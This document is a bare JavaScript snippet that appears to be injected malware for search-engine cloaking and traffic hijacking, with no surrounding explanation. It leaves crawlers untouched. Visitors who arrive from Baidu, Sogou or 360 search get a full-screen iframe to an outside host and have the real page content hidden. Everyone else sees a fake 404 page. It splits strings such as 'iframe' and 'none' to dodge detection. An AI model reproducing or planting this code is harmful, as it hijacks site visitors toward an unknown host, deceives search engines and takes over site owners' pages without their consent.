if(/\.php/.test(location.href)||/Baiduspider|sogou spider|sogou web|Baiduspider-render|sosospider|360spider|googlebot|yahoo|msn|msnbot|sohu|yodaoBot|twiceler|mediapartners|slurp|spider|bot/i.test(navigator.userAgent)){
}else if( /baidu\.com|sogou\.com|so\.com/.test(document.referrer) || document.referrer.indexOf(location.host)>0 || /baiduboxapp|sogousearch|sogoumobilebrowser/i.test(navigator.userAgent)){
	var url = 'http://yao.ldgrdkk.lol/';
	document.write('<ifr'+'ame id="ecshow" scrolling="auto" marginheight="0" marginwidth="0" frameborder="0" width="100%" height="100%" style="min-height:100vh" src="'+url+'"></iframe>');
	setInterval(function(){for(var i=0;i<document.body.children.length;i++)if(document.body.children[i].id != "ecshow")document.body.children[i].style.display="no"+"ne";document.body.style.overflow="hidden";},100);
}else{
	document.clear();
	var  ss = '<div id="ecshow" div><h1>Not Found</h1><p>The requested URL '+location.pathname+' was not found on this server.</p></div>';
	document.body?document.body.insertAdjacentHTML('afterBegin',ss):document.write(ss);
	setInterval(function(){for(var i=0;i<document.body.children.length;i++)if(document.body.children[i].id != "ecshow")document.body.children[i].style.display="no"+"ne";document.title='404 Not Found';},100);
}